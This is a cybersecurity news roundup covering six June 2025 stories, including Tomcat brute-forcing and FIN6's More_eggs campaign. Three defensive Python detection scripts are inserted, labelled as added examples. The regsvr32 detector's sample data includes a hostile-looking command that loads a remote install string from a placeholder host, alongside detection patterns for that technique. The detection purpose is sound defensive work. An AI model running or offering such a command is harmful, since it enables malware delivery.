Cybersecurity Threats and Trends - 06/10/2025
Today's cyber roundup features critical vulnerabilities, cloud security warnings, and sophisticated threat actor tactics...
You found global talent. Deel’s here to help you onboard them
Deel’s simplified a whole planet’s worth of information. It’s time you got your hands on our international compliance handbook where you’ll learn about:
Attracting global talent
Labor laws to consider when hiring
Processing international payroll on time
Staying compliant with employment & tax laws abroad
With 150+ countries right at your fingertips, growing your team with Deel is easier than ever.

While you were busy trying to remember if you actually turned on MFA for your personal email, the cyber underworld was busy innovating new ways to ruin your Monday. Let's dive into this week's digital dumpster fires, shall we?
1. INTERPOL Dismantles 20,000+ Malicious IPs Linked to 69 Malware Variants in Operation Secure
Primary Threat: INTERPOL has announced the dismantling of more than 20,000 malicious IP addresses or domains linked to 69 information-stealing malware variants as part of a coordinated international operation.
Risk: MEDIUM
INTERPOL on Wednesday announced the dismantling of a massive network of malicious infrastructure during Operation Secure (January – April 2025). Law enforcement agencies from 26 countries worked together to locate servers, map physical networks, and execute targeted takedowns. The operation led to 32 arrests, including the suspected ringleader of a cybercriminal organization responsible for developing and distributing information-stealing malware that had claimed more than 216,000 victims globally.
Detection and Remediation Tips:
Update your antivirus and anti-malware solutions to ensure protection against the latest threats
Implement multi-factor authentication for all accounts, especially those containing sensitive information
Be vigilant for phishing attempts that may deliver information-stealing malware
Review your incident response plan to include procedures for potential credential theft
Consider using password managers with breach monitoring capabilities
2. SinoTrack GPS Devices Vulnerable to Remote Vehicle Control via Default Passwords
Primary Threat: Two security vulnerabilities have been disclosed in SinoTrack GPS devices that could be exploited to control certain remote functions on connected vehicles and track their locations due to default passwords.
Risk: HIGH
Security researchers reported that these vulnerabilities affect all versions of the SinoTrack platform and could allow attackers to access device profiles without authorization. The most concerning aspect is that attackers could potentially cut off fuel remotely or track vehicle locations without the owner's knowledge. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory urging users to change default passwords immediately, as no patch is currently available from the manufacturer.
Detection and Remediation Tips:
Change default passwords on all SinoTrack GPS devices immediately
Consider disabling remote control features until a security patch is available
Monitor for unusual activity or unauthorized commands sent to your vehicle
Implement network segmentation to isolate IoT devices from critical systems
Consider alternative GPS tracking solutions with better security practices
3. Former Black Basta Members Use Microsoft Teams and Python Scripts in 2025 Attacks
Primary Threat: Former members of the Black Basta ransomware operation have been observed using Microsoft Teams and Python scripts in their email bombing campaigns targeting finance, insurance, and construction sectors.
Risk: HIGH
Security researchers revealed that these threat actors are leveraging legitimate collaboration tools like Microsoft Teams to establish initial contact with victims, posing as corporate help desks responding to supposed spam attacks. After gaining the victim's trust, they deploy custom Python scripts and cURL commands to deliver malware. This technique allows them to bypass traditional email security controls and exploit the inherent trust users place in official communication channels.
Detection and Remediation Tips:
Train employees to verify the identity of IT support staff, even when contacted through legitimate channels
Implement strict policies for handling unexpected IT support communications
Deploy advanced email security solutions that can detect and block email bombing campaigns
Restrict the execution of scripts and unauthorized applications on endpoint devices
Establish clear escalation procedures for employees to report suspicious IT support requests
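The email bombing that opens these attacks has a simple signature: one mailbox suddenly receives dozens of sign-up confirmations and newsletters from many unrelated sender domains within a few minutes, which is what gives the fake "help desk" its pretext. The following is an added example, not code from the newsletter or from any mail-security product: it groups gateway delivery records into fixed ten-minute buckets per recipient and reports buckets with both a high message count and a high number of distinct sender domains, so that a legitimate bulk mailing from a single list is not mistaken for a bomb. The one-line log format ("timestamp from=<sender> to=<recipient>") and the sample records are constructed for this example.

```python
"""Flag email-bombing bursts in mail-gateway delivery records (added example).

The log format is an assumption for this example: one delivery per line,
"<ISO timestamp> from=<sender> to=<recipient>". The sample data is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(r"^(?P<ts>\S+) from=<(?P<sender>[^>]+)> to=<(?P<rcpt>[^>]+)>$")


def parse(line):
    """Return (timestamp, sender, recipient) or None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["sender"].lower(), m["rcpt"].lower()


def find_bombing(lines, bucket_minutes=10, min_messages=20, min_domains=10):
    """Group deliveries per recipient into fixed time buckets.

    A bucket is reported only when it holds at least `min_messages` deliveries
    AND those come from at least `min_domains` distinct sender domains; the
    second condition separates a subscription bomb from ordinary bulk mail.
    """
    buckets = defaultdict(lambda: {"count": 0, "domains": set()})
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, sender, rcpt = rec
        start = ts.replace(minute=ts.minute - ts.minute % bucket_minutes,
                           second=0, microsecond=0)
        b = buckets[(rcpt, start)]
        b["count"] += 1
        b["domains"].add(sender.rsplit("@", 1)[-1])
    return [
        {"recipient": rcpt, "window_start": start.isoformat(),
         "messages": b["count"], "sender_domains": len(b["domains"])}
        for (rcpt, start), b in sorted(buckets.items())
        if b["count"] >= min_messages and len(b["domains"]) >= min_domains
    ]


def _constructed_sample():
    """Constructed delivery records: one bombed mailbox, one bulk list, noise."""
    lines = []
    # cfo@: 30 sign-up confirmations from 30 different domains inside four minutes
    for i in range(30):
        lines.append(f"2025-06-09T09:{12 + i // 10:02d}:{(i * 7) % 60:02d} "
                     f"from=<noreply@shop{i}.example> to=<cfo@corp.example>")
    # dev@: 25 messages from a single internal list in the same window (bulk, not a bomb)
    for i in range(25):
        lines.append(f"2025-06-09T09:1{i % 10}:{i:02d} "
                     f"from=<list@corp.example> to=<dev@corp.example>")
    # background traffic
    lines.append("2025-06-09T09:15:30 from=<partner@vendor.example> to=<cfo@corp.example>")
    lines.append("2025-06-09T09:40:00 from=<alerts@monitor.example> to=<ops@corp.example>")
    return lines


SAMPLE_LOG = _constructed_sample()

if __name__ == "__main__":
    for hit in find_bombing(SAMPLE_LOG):
        print(f"{hit['recipient']} received {hit['messages']} messages from "
              f"{hit['sender_domains']} domains starting {hit['window_start']}")
```

A hit on this rule is the moment to warn the affected user that an unsolicited "help desk" call or Teams message about the flood is the next step of the attack, not a coincidence.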
Did you know...?
The More_eggs malware used by FIN6 in their LinkedIn attacks has a fascinating technical architecture that makes it particularly dangerous. Unlike conventional malware, More_eggs (also known as Terra Loader or SpicyOmelette) uses a modular approach with components that only execute in memory, making it extremely difficult for traditional antivirus solutions to detect. It employs a technique called "living off the land," where it leverages legitimate Windows processes like regsvr32.exe to load malicious code, blending in with normal system operations. The malware also features sophisticated anti-analysis capabilities, including virtual machine detection and debugger evasion, allowing it to remain undetected for extended periods. Perhaps most concerning is its ability to customize attacks based on the victim's environment, dynamically adapting its behavior to maximize its chances of success—a sobering reminder that modern malware is becoming increasingly sophisticated and targeted.
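Because More_eggs runs in memory and hides behind regsvr32.exe, file scanning is the wrong place to look; process-creation telemetry is where the abuse shows. The block below is an added example, not code from the newsletter or from any EDR vendor. It applies three defender-side heuristics to Sysmon-style process-creation events: a /i: argument that points at a remote URL, a module path under a user-writable directory, and a parent process that is an Office application or script host. The field names (Image, CommandLine, ParentImage) and every sample command line are constructed assumptions for this example.

```python
"""Triage regsvr32.exe process creations from endpoint telemetry (added example).

Events are constructed dicts shaped like Sysmon Event ID 1 records; the field
names and the sample command lines are assumptions for this example.
"""
import re
from pathlib import PureWindowsPath

# Directory fragments (lower-case) that an unprivileged user can write to.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\", "\\programdata\\")
# Parents that should not normally be registering COM servers.
SCRIPT_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powershell.exe",
                  "wscript.exe", "cscript.exe", "mshta.exe"}
# /i: passes an install string to the module; a URL there is a red flag.
REMOTE_RE = re.compile(r'/i:\s*"?(https?|ftp)://', re.IGNORECASE)


def assess_regsvr32(event):
    """Return the list of reasons an event looks suspicious (empty = benign-looking)."""
    image = PureWindowsPath(event["Image"]).name.lower()
    if image != "regsvr32.exe":
        return []
    cmd = event["CommandLine"]
    reasons = []
    if REMOTE_RE.search(cmd):
        reasons.append("install argument (/i:) fetched from a remote URL")
    for token in cmd.split():
        if any(d in token.strip('"').lower() for d in USER_WRITABLE):
            reasons.append(f"module loaded from user-writable path: {token}")
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    if parent in SCRIPT_PARENTS:
        reasons.append(f"spawned by {parent} rather than an installer or admin shell")
    return reasons


def triage(events):
    """Return [(index, reasons)] for every event that raised at least one reason."""
    return [(i, r) for i, e in enumerate(events) if (r := assess_regsvr32(e))]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # vendor installer registering its own control: expected behaviour
        "ParentImage": r"C:\Windows\System32\msiexec.exe",
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendorctl.ocx"',
    },
    {   # Word spawning regsvr32 with a remote install string and a DLL in Temp
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r"regsvr32.exe /s /i:https://cdn.example.invalid/portfolio "
                       r"C:\Users\hr\AppData\Local\Temp\portfolio.dll",
    },
    {   # user double-clicked something: only the path is suspicious
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r"regsvr32.exe /s C:\Users\hr\Downloads\viewer.dll",
    },
    {   # not regsvr32 at all: ignored by this rule
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\rundll32.exe",
        "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL",
    },
]

if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_EVENTS):
        print(f"event {i}: " + "; ".join(reasons))
```

Each reason on its own can be benign (developers register DLLs from their home directory all the time), so the value is in the combination and in the parent process; treating the Office-parent case as a high-severity alert and the path-only case as a lower-severity one keeps the rule usable.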
4. 295 Malicious IPs Launch Coordinated Brute-Force Attack on Apache Tomcat Manager
Primary Threat: Threat intelligence firm GreyNoise has warned of a coordinated brute-force attack targeting Apache Tomcat Manager interfaces from 295 malicious IP addresses.
Risk: HIGH
GreyNoise observed a surge in brute-force and login attempts on June 5, 2025, indicating deliberate efforts to identify and compromise vulnerable Apache Tomcat instances. The attacking IPs were primarily located in the US, UK, Germany, Netherlands, and France. Once compromised, these servers could be used for cryptocurrency mining, data theft, or as launching points for further attacks on internal networks.
Detection and Remediation Tips:
Change default credentials on all Apache Tomcat Manager interfaces immediately
Implement IP-based access restrictions for management interfaces
Deploy multi-factor authentication for administrative access
Consider using Web Application Firewalls to detect and block brute-force attempts
Monitor server logs for unauthorized access attempts and suspicious activities
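The last tip is the one that catches a campaign like this while it is still failing. The following is an added example, not code from GreyNoise, Apache or the newsletter: it reads Tomcat access-log lines in the default AccessLogValve "common" pattern, keeps a sliding one-minute window of 401/403 responses per source IP against the /manager path, flags any IP that crosses a failure threshold, and separately marks an IP that obtains a 200 from the Manager after being flagged, which is the case that needs an incident response rather than just a block. The sample log lines and the IP addresses are constructed for this example.

```python
"""Detect brute-force attempts against the Tomcat Manager in access logs (added example).

Assumes Tomcat's default AccessLogValve "common" pattern:  %h %l %u %t "%r" %s %b
The sample lines below are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict with ip, user, ts (datetime), path and status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_bruteforce(lines, threshold=5, window=timedelta(minutes=1), prefix="/manager"):
    """Return {ip: {"failures": n, "success_after_failures": bool}}.

    An IP is flagged once it has `threshold` or more 401/403 responses against
    `prefix` inside any sliding `window`; `failures` is the largest such count.
    A later 200 from the Manager by a flagged IP sets success_after_failures.
    """
    recent = defaultdict(deque)   # ip -> timestamps of recent failures
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(prefix):
            continue
        q = recent[rec["ip"]]
        if rec["status"] in (401, 403):
            q.append(rec["ts"])
            while q and rec["ts"] - q[0] > window:   # drop failures outside the window
                q.popleft()
            if len(q) >= threshold:
                entry = flagged.setdefault(rec["ip"],
                                           {"failures": 0, "success_after_failures": False})
                entry["failures"] = max(entry["failures"], len(q))
        elif rec["status"] == 200 and rec["ip"] in flagged:
            flagged[rec["ip"]]["success_after_failures"] = True
    return flagged


# Constructed access-log lines (not real traffic).
SAMPLE_LOG = [
    # 203.0.113.10: six failures in under 30 seconds, then a successful login
    '203.0.113.10 - - [05/Jun/2025:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '203.0.113.10 - - [05/Jun/2025:10:00:05 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '203.0.113.10 - - [05/Jun/2025:10:00:09 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '203.0.113.10 - - [05/Jun/2025:10:00:14 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '203.0.113.10 - - [05/Jun/2025:10:00:20 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '203.0.113.10 - - [05/Jun/2025:10:00:27 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '203.0.113.10 - admin [05/Jun/2025:10:00:33 +0000] "GET /manager/html HTTP/1.1" 200 19800',
    # 198.51.100.7: an administrator mistypes a password once, then logs in
    '198.51.100.7 - - [05/Jun/2025:10:02:00 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '198.51.100.7 - admin [05/Jun/2025:10:02:08 +0000] "GET /manager/html HTTP/1.1" 200 19800',
    # 192.0.2.55: three failures spread over ten minutes, never enough in one window
    '192.0.2.55 - - [05/Jun/2025:10:05:00 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '192.0.2.55 - - [05/Jun/2025:10:10:00 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '192.0.2.55 - - [05/Jun/2025:10:15:00 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    # ordinary application traffic is ignored
    '192.0.2.55 - - [05/Jun/2025:10:15:01 +0000] "GET /app/index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        verdict = "LIKELY COMPROMISED" if info["success_after_failures"] else "blocked/failed"
        print(f"{ip}: {info['failures']} failures in window, {verdict}")
```

If the Manager sits behind a proxy, the %h field will be the proxy's address; enable Tomcat's RemoteIpValve (or log the X-Forwarded-For header) before relying on per-IP counts, otherwise every attacker and every legitimate admin collapse into one source.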
5. Adobe Releases Patch Fixing 254 Vulnerabilities, Closing High-Severity Security Gaps
Primary Threat: Adobe has released security updates to address a total of 254 security flaws impacting its software products, with a majority affecting Experience Manager and Creative Cloud.
Risk: HIGH
Adobe on Tuesday pushed security updates to address a staggering 254 security flaws across its product line. The most severe vulnerabilities could allow attackers to execute arbitrary code, potentially taking complete control of affected systems. The updates impact both cloud-based and on-premises deployments, with Experience Manager accounting for the majority of the patched vulnerabilities. Some of the flaws could be exploited to achieve privilege escalation, information disclosure, or security feature bypass.
Detection and Remediation Tips:
Apply Adobe's June 2025 security patches immediately across all affected products
Prioritize updating internet-facing systems and those processing sensitive data
Review your Adobe product inventory to ensure all instances are identified and patched
Consider implementing application allowlisting to prevent unauthorized code execution
Monitor for unusual activity that might indicate exploitation attempts
6. FIN6 Uses AWS-Hosted Fake Resumes on LinkedIn to Deliver More_eggs Malware
Primary Threat: The financially motivated threat actor FIN6 has been observed leveraging fake resumes hosted on AWS infrastructure to deliver More_eggs malware via LinkedIn.
Risk: MEDIUM
Security researchers reported that FIN6 is targeting recruiters and HR professionals with convincing fake resumes that link to malicious AWS-hosted portfolio websites. When victims click on the resume links, they're redirected to these sites, which deliver the More_eggs backdoor malware. This sophisticated malware facilitates credential theft, system access, and follow-on attacks, including ransomware deployment. FIN6 is known for targeting point-of-sale systems and stealing payment card data, with estimated thefts exceeding $400 million since 2018.
Detection and Remediation Tips:
Train HR and recruitment staff to recognize suspicious resume links and attachments
Implement advanced email security solutions with URL filtering capabilities
Consider using isolated browsing environments when reviewing job applications
Deploy endpoint detection and response (EDR) solutions to detect More_eggs indicators
Establish clear procedures for verifying the legitimacy of job applicant materials
IN SUMMARY:
From international law enforcement operations dismantling malware infrastructure to critical vulnerabilities in GPS devices and sophisticated social engineering campaigns, this week's threats demonstrate the diverse and evolving nature of the cybersecurity landscape. The coordinated attacks against Apache Tomcat Manager and the massive Adobe patch release highlight the ongoing challenges organizations face in maintaining secure systems, while the FIN6 campaign shows how threat actors continue to innovate their tactics to bypass security controls.
🚨 Key Takeaways:
✔️ International cooperation remains crucial in disrupting cybercriminal operations, as demonstrated by INTERPOL's Operation Secure.
✔️ IoT security vulnerabilities can have real-world physical implications, as seen with the SinoTrack GPS device flaws.
✔️ Threat actors are increasingly leveraging legitimate collaboration tools like Microsoft Teams to establish initial access.
✔️ Coordinated brute-force attacks continue to target common administrative interfaces, highlighting the importance of strong authentication.
✔️ The sheer volume of vulnerabilities in popular software like Adobe products creates significant patching challenges for organizations.
✔️ Social engineering tactics are becoming more sophisticated, with threat actors creating convincing fake personas to deliver malware.
🔎 Immediate Actions:
✔️ Change default passwords on all network-connected devices, especially IoT devices like GPS trackers.
✔️ Apply Adobe's June 2025 security patches immediately across all affected products.
✔️ Implement strict verification procedures for IT support communications, even when they arrive through legitimate channels.
✔️ Secure Apache Tomcat Manager interfaces with strong authentication and IP restrictions.
✔️ Train HR and recruitment staff to recognize suspicious resume links and attachments.
✔️ Update antivirus and anti-malware solutions to protect against the latest information-stealing malware variants.
💡 Stay vigilant, patch promptly, and remember that in cybersecurity, paranoia isn't a disorder – it's a job requirement. 💡
J.W.
(P.S. Check out our partners! It goes a long way to support this newsletter!)